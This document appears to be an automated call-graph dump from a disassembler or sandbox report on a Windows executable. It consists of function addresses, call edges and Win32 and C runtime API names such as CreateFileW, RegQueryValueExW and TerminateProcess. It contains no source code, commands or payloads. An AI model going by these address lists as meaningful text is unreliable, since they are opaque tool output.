99146->99145 99147->98598 99148->98593 99154 b499d2 __tzset_nolock _wcscmp 99149->99154 99150 ae506b 74 API calls 99150->99154 99151 b49866 99151->98604 99151->98632 99152 b49393 GetSystemTimeAsFileTime 99152->99154 99153 ae5045 85 API calls 99153->99154 99154->99150 99154->99151 99154->99152 99154->99153 99156 b48da9 99155->99156 99157 b48d9b 99155->99157 99159 b48dee 99156->99159 99160 b0548b 115 API calls 99156->99160 99185 b48db2 99156->99185 99158 b0548b 115 API calls 99157->99158 99158->99156 99186 b4901b 99159->99186 99162 b48dd3 99160->99162 99162->99159 99164 b48ddc 99162->99164 99163 b48e32 99165 b48e57 99163->99165 99167 b48e36 99163->99167 99168 b055d6 __fcloseall 83 API calls 99164->99168 99164->99185 99190 b48c33 99165->99190 99166 b48e43 99174 b055d6 __fcloseall 83 API calls 99166->99174 99166->99185 99167->99166 99170 b055d6 __fcloseall 83 API calls 99167->99170 99168->99185 99170->99166 99172 b48e85 99199 b48eb5 99172->99199 99173 b48e65 99175 b48e72 99173->99175 99177 b055d6 __fcloseall 83 API calls 99173->99177 99174->99185 99179 b055d6 __fcloseall 83 API calls 99175->99179 99175->99185 99177->99175 99179->99185 99182 b48ea0 99184 b055d6 __fcloseall 83 API calls 99182->99184 99182->99185 99184->99185 99185->98633 99187 b49040 99186->99187 99189 b49029 __tzset_nolock _memmove 99186->99189 99188 b05812 __fread_nolock 74 API calls 99187->99188 99188->99189 99189->99163 99191 b0594c __malloc_crt 58 API calls 99190->99191 99192 b48c42 99191->99192 99193 b0594c __malloc_crt 58 API calls 99192->99193 99194 b48c56 99193->99194 99195 b0594c __malloc_crt 58 API calls 99194->99195 99196 b48c6a 99195->99196 99197 b48f97 58 API calls 99196->99197 99198 b48c7d 99196->99198 99197->99198 99198->99172 99198->99173 99206 b48eca 99199->99206 99200 b48f82 99228 b491bf 99200->99228 99202 b48e8c 99207 b48f97 99202->99207 99203 b48c8f 74 API calls 99203->99206 99206->99200 99206->99202 99206->99203 99232 b48d2b 74 API calls 99206->99232 99233 b4909c 80 API calls 99206->99233 99208 b48fa4 99207->99208 99209 b48faa 99207->99209 99210 b02f95 _free 58 API calls 99208->99210 99211 b48fbb 99209->99211 99212 b02f95 _free 58 API calls 99209->99212 99210->99209 99213 b48e93 99211->99213 99214 b02f95 _free 58 API calls 99211->99214 99212->99211 99213->99182 99215 b055d6 99213->99215 99214->99213 99216 b055e2 __close 99215->99216 99217 b055f6 99216->99217 99218 b0560e 99216->99218 99315 b08d68 58 API calls __getptd_noexit 99217->99315 99221 b06e4e __lock_file 59 API calls 99218->99221 99224 b05606 __close 99218->99224 99220 b055fb 99316 b08ff6 9 API calls __close 99220->99316 99223 b05620 99221->99223 99299 b0556a 99223->99299 99224->99182 99229 b491dd 99228->99229 99230 b491cc 99228->99230 99229->99202 99234 b04a93 99230->99234 99232->99206 99233->99206 99235 b04a9f __close 99234->99235 99236 b04ad5 99235->99236 99237 b04abd 99235->99237 99240 b04acd __close 99235->99240 99238 b06e4e __lock_file 59 API calls 99236->99238 99259 b08d68 58 API calls __getptd_noexit 99237->99259 99241 b04adb 99238->99241 99240->99229 99247 b0493a 99241->99247 99242 b04ac2 99260 b08ff6 9 API calls __close 99242->99260 99250 b04949 99247->99250 99253 b04967 99247->99253 99248 b04957 99290 b08d68 58 API calls __getptd_noexit 99248->99290 99250->99248 99250->99253 99257 b04981 _memmove 99250->99257 99251 b0495c 99291 b08ff6 9 API calls __close 99251->99291 99261 b04b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 99253->99261 99256 b04916 __filbuf 58 API calls 99256->99257 99257->99253 99257->99256 99262 b0dac6 99257->99262 99292 b04c6d 99257->99292 99298 b0b05e 78 API calls 7 library calls 99257->99298 99259->99242 99260->99240 99261->99240 99263 b0dad2 __close 99262->99263 99264 b0daf6 99263->99264 99265 b0dadf 99263->99265 99267 b0db95 99264->99267 99269 b0db0a 99264->99269 99266 b08d34 __close 58 API calls 99265->99266 99268 b0dae4 99266->99268 99270 b08d34 __close 58 API calls 99267->99270 99271 b08d68 __close 58 API calls 99268->99271 99272 b0db32 99269->99272 99273 b0db28 99269->99273 99274 b0db2d 99270->99274 99276 b0daeb __close 99271->99276 99275 b0d446 ___lock_fhandle 59 API calls 99272->99275 99277 b08d34 __close 58 API calls 99273->99277 99279 b08d68 __close 58 API calls 99274->99279 99278 b0db38 99275->99278 99276->99257 99277->99274 99280 b0db4b 99278->99280 99281 b0db5e 99278->99281 99282 b0dba1 99279->99282 99283 b0dbb5 __write_nolock 76 API calls 99280->99283 99285 b08d68 __close 58 API calls 99281->99285 99284 b08ff6 __close 9 API calls 99282->99284 99287 b0db57 99283->99287 99284->99276 99286 b0db63 99285->99286 99288 b08d34 __close 58 API calls 99286->99288 99289 b0db8d __write LeaveCriticalSection 99287->99289 99288->99287 99289->99276 99290->99251 99291->99253 99293 b04ca4 99292->99293 99294 b04c80 99292->99294 99293->99257 99294->99293 99295 b04916 __filbuf 58 API calls 99294->99295 99296 b04c9d 99295->99296 99297 b0dac6 __write 78 API calls 99296->99297 99297->99293 99298->99257 99300 b05579 99299->99300 99301 b0558d 99299->99301 99348 b08d68 58 API calls __getptd_noexit 99300->99348 99304 b04c6d __flush 78 API calls 99301->99304 99307 b05589 99301->99307 99303 b0557e 99349 b08ff6 9 API calls __close 99303->99349 99306 b05599 99304->99306 99318 b10dc7 99306->99318 99317 b05645 LeaveCriticalSection LeaveCriticalSection __wfsopen 99307->99317 99310 b04916 __filbuf 58 API calls 99311 b055a7 99310->99311 99322 b10c52 99311->99322 99313 b055ad 99313->99307 99314 b02f95 _free 58 API calls 99313->99314 99314->99307 99315->99220 99316->99224 99317->99224 99319 b10dd4 99318->99319 99321 b055a1 99318->99321 99320 b02f95 _free 58 API calls 99319->99320 99319->99321 99320->99321 99321->99310 99323 b10c5e __close 99322->99323 99324 b10c82 99323->99324 99325 b10c6b 99323->99325 99327 b10d0d 99324->99327 99329 b10c92 99324->99329 99374 b08d34 58 API calls __getptd_noexit 99325->99374 99379 b08d34 58 API calls __getptd_noexit 99327->99379 99328 b10c70 99375 b08d68 58 API calls __getptd_noexit 99328->99375 99332 b10cb0 99329->99332 99333 b10cba 99329->99333 99376 b08d34 58 API calls __getptd_noexit 99332->99376 99350 b0d446 99333->99350 99334 b10cb5 99380 b08d68 58 API calls __getptd_noexit 99334->99380 99336 b10c77 __close 99336->99313 99339 b10cc0 99341 b10cd3 99339->99341 99342 b10cde 99339->99342 99340 b10d19 99381 b08ff6 9 API calls __close 99340->99381 99359 b10d2d 99341->99359 99377 b08d68 58 API calls __getptd_noexit 99342->99377 99346 b10cd9 99378 b10d05 LeaveCriticalSection __unlock_fhandle 99346->99378 99348->99303 99349->99307 99351 b0d452 __close 99350->99351 99352 b0d4a1 EnterCriticalSection 99351->99352 99354 b09e4b __lock 58 API calls 99351->99354 99353 b0d4c7 __close 99352->99353 99353->99339 99355 b0d477 99354->99355 99356 b0d48f 99355->99356 99382 b0a06b InitializeCriticalSectionAndSpinCount 99355->99382 99383 b0d4cb LeaveCriticalSection _doexit 99356->99383 99384 b0d703 99359->99384 99361 b10d91 99397 b0d67d 59 API calls __close 99361->99397 99363 b10d3b 99363->99361 99364 b10d6f 99363->99364 99366 b0d703 __lseeki64_nolock 58 API calls 99363->99366 99364->99361 99367 b0d703 __lseeki64_nolock 58 API calls 99364->99367 99365 b10d99 99368 b10dbb 99365->99368 99398 b08d47 58 API calls 2 library calls 99365->99398 99369 b10d66 99366->99369 99370 b10d7b CloseHandle 99367->99370 99368->99346 99372 b0d703 __lseeki64_nolock 58 API calls 99369->99372 99370->99361 99373 b10d87 GetLastError 99370->99373 99372->99364 99373->99361 99374->99328 99375->99336 99376->99334 99377->99346 99378->99336 99379->99334 99380->99340 99381->99336 99382->99356 99383->99352 99385 b0d70e 99384->99385 99387 b0d723 99384->99387 99386 b08d34 __close 58 API calls 99385->99386 99389 b0d713 99386->99389 99388 b08d34 __close 58 API calls 99387->99388 99392 b0d748 99387->99392 99390 b0d752 99388->99390 99391 b08d68 __close 58 API calls 99389->99391 99393 b08d68 __close 58 API calls 99390->99393 99394 b0d71b 99391->99394 99392->99363 99395 b0d75a 99393->99395 99394->99363 99396 b08ff6 __close 9 API calls 99395->99396 99396->99394 99397->99365 99398->99368 99461 b11b90 99399->99461 99402 ae48da 99405 ae7d2c 59 API calls 99402->99405 99403 ae48f7 99467 ae7eec 99403->99467 99406 ae48e6 99405->99406 99463 ae7886 99406->99463 99409 b009d5 99410 b11b90 __ftell_nolock 99409->99410 99411 b009e2 GetLongPathNameW 99410->99411 99412 ae7d2c 59 API calls 99411->99412 99413 ae741d 99412->99413 99414 ae716b 99413->99414 99415 ae77c7 59 API calls 99414->99415 99416 ae717d 99415->99416 99417 ae48ae 60 API calls 99416->99417 99418 ae7188 99417->99418 99419 ae7193 99418->99419 99420 b1ecae 99418->99420 99421 ae3f84 59 API calls 99419->99421 99425 b1ecc8 99420->99425 99481 ae7a68 61 API calls 99420->99481 99423 ae719f 99421->99423 99475 ae34c2 99423->99475 99426 ae71b2 Mailbox 99426->98322 99428 ae4f3d 136 API calls 99427->99428 99429 ae69ef 99428->99429 99430 b1e45a 99429->99430 99431 ae4f3d 136 API calls 99429->99431 99432 b497e5 122 API calls 99430->99432 99433 ae6a03 99431->99433 99434 b1e46f 99432->99434 99433->99430 99435 ae6a0b 99433->99435 99436 b1e490 99434->99436 99437 b1e473 99434->99437 99439 ae6a17 99435->99439 99440 b1e47b 99435->99440 99438 b00ff6 Mailbox 59 API calls 99436->99438 99441 ae4faa 84 API calls 99437->99441 99458 b1e4d5 Mailbox 99438->99458 99482 ae6bec 99439->99482 99583 b44534 90 API calls _wprintf 99440->99583 99441->99440 99445 b1e489 99445->99436 99446 b1e689 99447 b02f95 _free 58 API calls 99446->99447 99448 b1e691 99447->99448 99449 ae4faa 84 API calls 99448->99449 99454 b1e69a 99449->99454 99453 b02f95 _free 58 API calls 99453->99454 99454->99453 99455 ae4faa 84 API calls 99454->99455 99587 b3fcb1 89 API calls 4 library calls 99454->99587 99455->99454 99457 ae7f41 59 API calls 99457->99458 99458->99446 99458->99454 99458->99457 99574 b3fc4d 99458->99574 99577 b47621 99458->99577 99584 b3fb6e 61 API calls 2 library calls 99458->99584 99585 ae766f 59 API calls 2 library calls 99458->99585 99586 ae74bd 59 API calls Mailbox 99458->99586 99462 ae48bb GetFullPathNameW 99461->99462 99462->99402 99462->99403 99464 ae7894 99463->99464 99471 ae7e8c 99464->99471 99466 ae48f2 99466->99409 99468 ae7f06 99467->99468 99470 ae7ef9 99467->99470 99469 b00ff6 Mailbox 59 API calls 99468->99469 99469->99470 99470->99406 99472 ae7e9a 99471->99472 99474 ae7ea3 _memmove 99471->99474 99473 ae7faf 59 API calls 99472->99473 99472->99474 99473->99474 99474->99466 99476 ae34d4 99475->99476 99480 ae34f3 _memmove 99475->99480 99478 b00ff6 Mailbox 59 API calls 99476->99478 99477 b00ff6 Mailbox 59 API calls 99479 ae350a 99477->99479 99478->99480 99479->99426 99480->99477 99481->99420 99483 b1e847 99482->99483 99484 ae6c15 99482->99484 99679 b3fcb1 89 API calls 4 library calls 99483->99679 99593 ae5906 60 API calls Mailbox 99484->99593 99487 b1e85a 99680 b3fcb1 89 API calls 4 library calls 99487->99680 99488 ae6c37 99594 ae5956 99488->99594 99492 ae6c54 99493 ae77c7 59 API calls 99492->99493 99495 ae6c60 99493->99495 99494 b1e876 99497 ae6cc1 99494->99497 99607 b00b9b 60 API calls __ftell_nolock 99495->99607 99499 ae6ccf 99497->99499 99500 b1e889 99497->99500 99498 ae6c6c 99501 ae77c7 59 API calls 99498->99501 99503 ae77c7 59 API calls 99499->99503 99502 ae5dcf CloseHandle 99500->99502 99504 ae6c78 99501->99504 99505 b1e895 99502->99505 99506 ae6cd8 99503->99506 99507 ae48ae 60 API calls 99504->99507 99508 ae4f3d 136 API calls 99505->99508 99509 ae77c7 59 API calls 99506->99509 99511 ae6c86 99507->99511 99512 b1e8b1 99508->99512 99510 ae6ce1 99509->99510 99617 ae46f9 99510->99617 99608 ae59b0 ReadFile SetFilePointerEx 99511->99608 99515 b1e8da 99512->99515 99519 b497e5 122 API calls 99512->99519 99681 b3fcb1 89 API calls 4 library calls 99515->99681 99516 ae6cf8 99518 ae6cb2 99609 ae5c4e 99518->99609 99520 b1e8cd 99519->99520 99523 b1e8d5 99520->99523 99524 b1e8f6 99520->99524 99526 ae4faa 84 API calls 99523->99526 99527 ae4faa 84 API calls 99524->99527 99526->99515 99529 b1e8fb 99527->99529 99528 ae6e6c Mailbox 99588 ae5934 99528->99588 99530 b00ff6 Mailbox 59 API calls 99529->99530 99537 b1e92f 99530->99537 99534 ae3bcd 99534->98184 99534->98210 99682 ae766f 59 API calls 2 library calls 99537->99682 99540 b1eb69 99686 b47581 59 API calls Mailbox 99540->99686 99546 b1eb8b 99687 b4f835 59 API calls 2 library calls 99546->99687 99549 b1eb98 99551 b02f95 _free 58 API calls 99549->99551 99551->99528 99562 b3fc4d 59 API calls 99571 b1e978 Mailbox 99562->99571 99564 ae7f41 59 API calls 99564->99571 99565 b47621 59 API calls 99565->99571 99568 b1ebbb 99688 b3fcb1 89 API calls 4 library calls 99568->99688 99570 b1ebd4 99572 b02f95 _free 58 API calls 99570->99572 99571->99540 99571->99562 99571->99564 99571->99565 99571->99568 99683 b3fb6e 61 API calls 2 library calls 99571->99683 99684 ae766f 59 API calls 2 library calls 99571->99684 99685 ae7373 59 API calls Mailbox 99571->99685 99573 b1e8f1 99572->99573 99573->99528 99575 b00ff6 Mailbox 59 API calls 99574->99575 99576 b3fc7d _memmove 99575->99576 99576->99458 99576->99576 99578 b4762c 99577->99578 99579 b00ff6 Mailbox 59 API calls 99578->99579 99581 b47643 99579->99581 99580 b47652 99580->99458 99581->99580 99582 ae7f41 59 API calls 99581->99582 99582->99580 99583->99445 99584->99458 99585->99458 99586->99458 99587->99454 99589 ae5dcf CloseHandle 99588->99589 99590 ae593c Mailbox 99589->99590 99591 ae5dcf CloseHandle 99590->99591 99592 ae594b 99591->99592 99592->99534 99593->99488 99595 ae5dcf CloseHandle 99594->99595 99596 ae5962 99595->99596 99691 ae5df9 99596->99691 99598 ae59a4 99598->99487 99598->99492 99599 ae5981 99599->99598 99699 ae5770 99599->99699 99601 ae5993 99716 ae53db SetFilePointerEx SetFilePointerEx 99601->99716 99603 ae599a 99603->99598 99604 b1e030 99603->99604 99717 b43696 SetFilePointerEx SetFilePointerEx WriteFile 99604->99717 99606 b1e060 99606->99598 99607->99498 99608->99518 99614 ae5c68 99609->99614 99610 ae5cef SetFilePointerEx 99730 ae5dae SetFilePointerEx 99610->99730 99611 b1e151 99731 ae5dae SetFilePointerEx 99611->99731 99614->99610 99614->99611 99616 ae5cc3 99614->99616 99615 b1e16b 99616->99497 99618 ae77c7 59 API calls 99617->99618 99619 ae470f 99618->99619 99620 ae77c7 59 API calls 99619->99620 99621 ae4717 99620->99621 99622 ae77c7 59 API calls 99621->99622 99623 ae471f 99622->99623 99624 ae77c7 59 API calls 99623->99624 99625 ae4727 99624->99625 99626 ae475b 99625->99626 99627 b1d8fb 99625->99627 99628 ae79ab 59 API calls 99626->99628 99629 ae81a7 59 API calls 99627->99629 99630 ae4769 99628->99630 99631 b1d904 99629->99631 99632 ae7e8c 59 API calls 99630->99632 99633 ae7eec 59 API calls 99631->99633 99634 ae4773 99632->99634 99636 ae479e 99633->99636 99635 ae79ab 59 API calls 99634->99635 99634->99636 99637 ae4794 99635->99637 99638 ae47bd 99636->99638 99639 b1d924 99636->99639 99654 ae47de 99636->99654 99641 ae7e8c 59 API calls 99637->99641 99643 ae7b52 59 API calls 99638->99643 99642 b1d9f4 99639->99642 99650 b1d9dd 99639->99650 99662 b1d95b 99639->99662 99641->99636 99645 ae7d2c 59 API calls 99642->99645 99648 ae47c7 99643->99648 99644 ae47ef 99646 ae4801 99644->99646 99647 ae81a7 59 API calls 99644->99647 99663 b1d9b1 99645->99663 99649 ae81a7 59 API calls 99646->99649 99651 ae4811 99646->99651 99647->99646 99653 ae79ab 59 API calls 99648->99653 99648->99654 99649->99651 99650->99642 99658 b1d9c8 99650->99658 99652 ae4818 99651->99652 99655 ae81a7 59 API calls 99651->99655 99656 ae81a7 59 API calls 99652->99656 99665 ae481f Mailbox 99652->99665 99653->99654 99732 ae79ab 99654->99732 99655->99652 99656->99665 99657 ae7b52 59 API calls 99657->99663 99661 ae7d2c 59 API calls 99658->99661 99659 b1d9b9 99660 ae7d2c 59 API calls 99659->99660 99660->99663 99661->99663 99662->99659 99666 b1d9a4 99662->99666 99663->99654 99663->99657 99745 ae7a84 59 API calls 2 library calls 99663->99745 99665->99516 99667 ae7d2c 59 API calls 99666->99667 99667->99663 99679->99487 99680->99494 99681->99573 99682->99571 99683->99571 99684->99571 99685->99571 99686->99546 99687->99549 99688->99570 99692 b1e181 99691->99692 99693 ae5e12 CreateFileW 99691->99693 99694 b1e187 CreateFileW 99692->99694 99695 ae5e34 99692->99695 99693->99695 99694->99695 99696 b1e1ad 99694->99696 99695->99599 99697 ae5c4e 2 API calls 99696->99697 99698 b1e1b8 99697->99698 99698->99695 99700 ae578b 99699->99700 99701 b1dfce 99699->99701 99702 ae5c4e 2 API calls 99700->99702 99715 ae581a 99700->99715 99701->99715 99724 ae5e3f 99701->99724 99703 ae57ad 99702->99703 99705 ae538e 59 API calls 99703->99705 99706 ae57b7 99705->99706 99706->99701 99707 ae57c4 99706->99707 99708 b00ff6 Mailbox 59 API calls 99707->99708 99709 ae57cf 99708->99709 99710 ae538e 59 API calls 99709->99710 99711 ae57da 99710->99711 99718 ae5d20 99711->99718 99713 ae5807 99714 ae5c4e 2 API calls 99713->99714 99714->99715 99715->99601 99716->99603 99717->99606 99719 ae5d93 99718->99719 99722 ae5d2e 99718->99722 99729 ae5dae SetFilePointerEx 99719->99729 99721 ae5d56 99721->99713 99722->99721 99723 ae5d66 ReadFile 99722->99723 99723->99721 99723->99722 99725 ae5c4e 2 API calls 99724->99725 99726 ae5e60 99725->99726 99727 ae5c4e 2 API calls 99726->99727 99728 ae5e74 99727->99728 99728->99715 99729->99722 99730->99616 99731->99615 99733 ae79ba 99732->99733 99734 ae7a17 99732->99734 99733->99734 99736 ae79c5 99733->99736 99735 ae7e8c 59 API calls 99734->99735 99737 ae79e8 _memmove 99735->99737 99738 b1ef32 99736->99738 99739 ae79e0 99736->99739 99737->99644 99747 ae8189 99738->99747 99746 ae8087 59 API calls Mailbox 99739->99746 99742 b1ef3c 99743 b00ff6 Mailbox 59 API calls 99742->99743 99745->99663 99746->99737 99748 b00ff6 Mailbox 59 API calls 99747->99748 99749 ae8193 99748->99749 99749->99742 99750->98333 99752 ae6ef5 99751->99752 99756 ae7009 99751->99756 99753 b00ff6 Mailbox 59 API calls 99752->99753 99752->99756 99755 ae6f1c 99753->99755 99754 b00ff6 Mailbox 59 API calls 99757 ae6f91 99754->99757 99755->99754 99756->98337 99757->99756 99762->98340 99763->98342 100268 ae107d 100273 ae71eb 100268->100273 100270 ae108c 100271 b02f80 __cinit 67 API calls 100270->100271 100272 ae1096 100271->100272 100274 ae71fb __ftell_nolock 100273->100274 100275 ae77c7 59 API calls 100274->100275 100276 ae72b1 100275->100276 100277 ae4864 61 API calls 100276->100277 100278 ae72ba 100277->100278 100304 b0074f 100278->100304 100281 ae7e0b 59 API calls 100282 ae72d3 100281->100282 100283 ae3f84 59 API calls 100282->100283 100284 ae72e2 100283->100284 100285 ae77c7 59 API calls 100284->100285 100286 ae72eb 100285->100286 100287 ae7eec 59 API calls 100286->100287 100288 ae72f4 RegOpenKeyExW 100287->100288 100289 b1ecda RegQueryValueExW 100288->100289 100293 ae7316 Mailbox 100288->100293 100290 b1ecf7 100289->100290 100291 b1ed6c RegCloseKey 100289->100291 100292 b00ff6 Mailbox 59 API calls 100290->100292 100291->100293 100296 b1ed7e _wcscat Mailbox __wsetenvp 100291->100296 100294 b1ed10 100292->100294 100293->100270 100295 ae538e 59 API calls 100294->100295 100297 b1ed1b RegQueryValueExW 100295->100297 100296->100293 100301 ae7f41 59 API calls 100296->100301 100302 ae3f84 59 API calls 100296->100302 100303 ae7b52 59 API calls 100296->100303 100298 b1ed38 100297->100298 100300 b1ed52 100297->100300 100299 ae7d2c 59 API calls 100298->100299 100299->100300 100300->100291 100301->100296 100302->100296 100303->100296 100305 b11b90 __ftell_nolock 100304->100305 100306 b0075c GetFullPathNameW 100305->100306 100307 b0077e 100306->100307 100308 ae7d2c 59 API calls 100307->100308 100309 ae72c5 100308->100309 100309->100281 100310 ae568a 100317 ae5c18 100310->100317 100316 ae56ba Mailbox 100318 b00ff6 Mailbox 59 API calls 100317->100318 100319 ae5c2b 100318->100319 100320 b00ff6 Mailbox 59 API calls 100319->100320 100321 ae569c 100320->100321 100322 ae5632 100321->100322 100336 ae5a2f 100322->100336 100324 ae5674 100324->100316 100328 ae81c1 MultiByteToWideChar 100324->100328 100325 ae5d20 2 API calls 100326 ae5643 100325->100326 100326->100324 100326->100325 100343 ae5bda 100326->100343 100329 ae822e 100328->100329 100330 ae81e7 100328->100330 100332 ae7eec 59 API calls 100329->100332 100331 b00ff6 Mailbox 59 API calls 100330->100331 100333 ae81fc MultiByteToWideChar 100331->100333 100335 ae8220 100332->100335 100359 ae78ad 100333->100359 100335->100316 100337 b1e065 100336->100337 100338 ae5a40 100336->100338 100352 b36443 59 API calls Mailbox 100337->100352 100338->100326 100340 b1e06f 100341 b00ff6 Mailbox 59 API calls 100340->100341 100342 b1e07b 100341->100342 100344 ae5bee 100343->100344 100345 b1e117 100343->100345 100353 ae5b19 100344->100353 100358 b36443 59 API calls Mailbox 100345->100358 100348 ae5bfa 100348->100326 100349 b1e122 100350 b00ff6 Mailbox 59 API calls 100349->100350 100351 b1e137 _memmove 100350->100351 100352->100340 100354 ae5b31 100353->100354 100357 ae5b2a _memmove 100353->100357 100355 b00ff6 Mailbox 59 API calls 100354->100355 100356 b1e0a7 100354->100356 100355->100357 100356->100356 100357->100348 100358->100349 100360 ae792f 100359->100360 100361 ae78bc 100359->100361 100362 ae7e8c 59 API calls 100360->100362 100361->100360 100363 ae78c8 100361->100363 100369 ae78da _memmove 100362->100369 100364 ae78d2 100363->100364 100365 ae7900 100363->100365 100371 ae8087 59 API calls Mailbox 100364->100371 100366 ae8189 59 API calls 100365->100366 100368 ae790a 100366->100368 100370 b00ff6 Mailbox 59 API calls 100368->100370 100369->100335 100370->100369 100371->100369 100372 b20226 100378 aeade2 Mailbox 100372->100378 100374 b20c86 100536 b366f4 100374->100536 100376 b20c8f 100377 ae9df0 Mailbox 59 API calls 100377->100378 100378->100374 100378->100376 100378->100377 100379 b200e0 VariantClear 100378->100379 100380 aeb6c1 100378->100380 100385 b5474d 331 API calls 100378->100385 100389 b4d2e5 100378->100389 100436 b5e237 100378->100436 100439 b6251d 100378->100439 100444 b4d2e6 100378->100444 100491 af2123 100378->100491 100531 b5e24b 100378->100531 100534 b37405 59 API calls 100378->100534 100379->100378 100535 b4a0b5 89 API calls 4 library calls 100380->100535 100385->100378 100390 b4d305 100389->100390 100391 b4d310 100389->100391 100392 ae9c9c 59 API calls 100390->100392 100393 b4d3ea Mailbox 100391->100393 100395 ae77c7 59 API calls 100391->100395 100392->100391 100394 b00ff6 Mailbox 59 API calls 100393->100394 100434 b4d3f3 Mailbox 100393->100434 100396 b4d433 100394->100396 100397 b4d334 100395->100397 100398 b4d43f 100396->100398 100540 ae5906 60 API calls Mailbox 100396->100540 100399 ae77c7 59 API calls 100397->100399 100402 ae9997 84 API calls 100398->100402 100401 b4d33d 100399->100401 100404 ae9997 84 API calls 100401->100404 100403 b4d457 100402->100403 100405 ae5956 67 API calls 100403->100405 100406 b4d349 100404->100406 100407 b4d466 100405->100407 100408 ae46f9 59 API calls 100406->100408 100409 b4d49e 100407->100409 100410 b4d46a GetLastError 100407->100410 100411 b4d35e 100408->100411 100414 b4d500 100409->100414 100415 b4d4c9 100409->100415 100413 b4d483 100410->100413 100412 ae7c8e 59 API calls 100411->100412 100416 b4d391 100412->100416 100413->100434 100541 ae5a1a CloseHandle 100413->100541 100419 b00ff6 Mailbox 59 API calls 100414->100419 100417 b00ff6 Mailbox 59 API calls 100415->100417 100418 b4d3e3 100416->100418 100422 b43e73 3 API calls 100416->100422 100421 b4d4ce 100417->100421 100420 ae9c9c 59 API calls 100418->100420 100424 b4d505 100419->100424 100420->100393 100426 ae77c7 59 API calls 100421->100426 100428 b4d4df 100421->100428 100425 b4d3a1 100422->100425 100429 ae77c7 59 API calls 100424->100429 100424->100434 100425->100418 100427 b4d3a5 100425->100427 100426->100428 100430 ae7f41 59 API calls 100427->100430 100542 b4f835 59 API calls 2 library calls 100428->100542 100429->100434 100432 b4d3b2 100430->100432 100539 b43c66 63 API calls Mailbox 100432->100539 100434->100378 100435 b4d3bb Mailbox 100435->100418 100543 b5cdf1 100436->100543 100438 b5e247 100438->100378 100633 b3f8f2 100439->100633 100441 b62529 100652 ae9b9c 59 API calls Mailbox 100441->100652 100443 b62545 Mailbox 100443->100378 100445 b4d305 100444->100445 100446 b4d310 100444->100446 100447 ae9c9c 59 API calls 100445->100447 100448 b4d3ea Mailbox 100446->100448 100450 ae77c7 59 API calls 100446->100450 100447->100446 100449 b00ff6 Mailbox 59 API calls 100448->100449 100488 b4d3f3 Mailbox 100448->100488 100451 b4d433 100449->100451 100452 b4d334 100450->100452 100453 b4d43f 100451->100453 100655 ae5906 60 API calls Mailbox 100451->100655 100454 ae77c7 59 API calls 100452->100454 100457 ae9997 84 API calls 100453->100457 100456 b4d33d 100454->100456 100459 ae9997 84 API calls 100456->100459 100458 b4d457 100457->100458 100460 ae5956 67 API calls 100458->100460 100461 b4d349 100459->100461 100462 b4d466 100460->100462 100463 ae46f9 59 API calls 100461->100463 100464 b4d49e 100462->100464 100465 b4d46a GetLastError 100462->100465 100466 b4d35e 100463->100466 100469 b4d500 100464->100469 100470 b4d4c9 100464->100470 100468 b4d483 100465->100468 100467 ae7c8e 59 API calls 100466->100467 100471 b4d391 100467->100471 100468->100488 100656 ae5a1a CloseHandle 100468->100656 100474 b00ff6 Mailbox 59 API calls 100469->100474 100472 b00ff6 Mailbox 59 API calls 100470->100472 100473 b4d3e3 100471->100473 100477 b43e73 3 API calls 100471->100477 100476 b4d4ce 100472->100476 100475 ae9c9c 59 API calls 100473->100475 100479 b4d505 100474->100479 100475->100448 100480 b4d4df 100476->100480 100482 ae77c7 59 API calls 100476->100482 100481 b4d3a1 100477->100481 100484 ae77c7 59 API calls 100479->100484 100479->100488 100657 b4f835 59 API calls 2 library calls 100480->100657 100481->100473 100483 b4d3a5 100481->100483 100482->100480 100485 ae7f41 59 API calls 100483->100485 100484->100488 100487 b4d3b2 100485->100487 100654 b43c66 63 API calls Mailbox 100487->100654 100488->100378 100490 b4d3bb Mailbox 100490->100473 100492 ae9bf8 59 API calls 100491->100492 100493 af213b 100492->100493 100494 b00ff6 Mailbox 59 API calls 100493->100494 100498 b269af 100493->100498 100496 af2154 100494->100496 100499 af2164 100496->100499 100673 ae5906 60 API calls Mailbox 100496->100673 100497 af2189 100502 ae9c9c 59 API calls 100497->100502 100506 af2196 100497->100506 100498->100497 100677 b4f7df 59 API calls 100498->100677 100501 ae9997 84 API calls 100499->100501 100503 af2172 100501->100503 100504 b269f7 100502->100504 100505 ae5956 67 API calls 100503->100505 100504->100506 100507 b269ff 100504->100507 100508 af2181 100505->100508 100510 ae5e3f 2 API calls 100506->100510 100509 ae9c9c 59 API calls 100507->100509 100508->100497 100508->100498 100676 ae5a1a CloseHandle 100508->100676 100512 af219d 100509->100512 100510->100512 100513 b26a11 100512->100513 100514 af21b7 100512->100514 100516 b00ff6 Mailbox 59 API calls 100513->100516 100515 ae77c7 59 API calls 100514->100515 100517 af21bf 100515->100517 100518 b26a17 100516->100518 100658 ae56d2 100517->100658 100523 b26a2b 100518->100523 100678 ae59b0 ReadFile SetFilePointerEx 100518->100678 100521 af21ce 100525 b26a2f _memmove 100521->100525 100674 ae9b9c 59 API calls Mailbox 100521->100674 100523->100525 100679 b4794e 59 API calls 2 library calls 100523->100679 100526 af21e2 Mailbox 100527 af221c 100526->100527 100528 ae5dcf CloseHandle 100526->100528 100527->100378 100529 af2210 100528->100529 100529->100527 100675 ae5a1a CloseHandle 100529->100675 100532 b5cdf1 130 API calls 100531->100532 100533 b5e25b 100532->100533 100533->100378 100534->100378 100535->100374 100683 b36636 100536->100683 100538 b36702 100538->100376 100539->100435 100540->100398 100541->100434 100542->100434 100544 ae9997 84 API calls 100543->100544 100545 b5ce2e 100544->100545 100549 b5ce75 Mailbox 100545->100549 100581 b5dab9 100545->100581 100547 b5d242 100620 b5dbdc 92 API calls Mailbox 100547->100620 100549->100438 100551 b5d251 100552 b5d0db 100551->100552 100553 b5d25d 100551->100553 100594 b5cc82 100552->100594 100553->100549 100554 ae9997 84 API calls 100560 b5cec6 Mailbox 100554->100560 100559 b5d114 100609 b00e48 100559->100609 100560->100549 100560->100554 100568 b5d0cd 100560->100568 100613 b4f835 59 API calls 2 library calls 100560->100613 100614 b5d2f3 61 API calls 2 library calls 100560->100614 100563 b5d147 100566 ae942e 59 API calls 100563->100566 100564 b5d12e 100615 b4a0b5 89 API calls 4 library calls 100564->100615 100569 b5d153 100566->100569 100567 b5d139 GetCurrentProcess TerminateProcess 100567->100563 100568->100547 100568->100552 100570 ae91b0 59 API calls 100569->100570 100571 b5d169 100570->100571 100580 b5d190 100571->100580 100616 ae8ea0 59 API calls Mailbox 100571->100616 100572 b5d2b8 100572->100549 100576 b5d2cc FreeLibrary 100572->100576 100574 b5d17f 100617 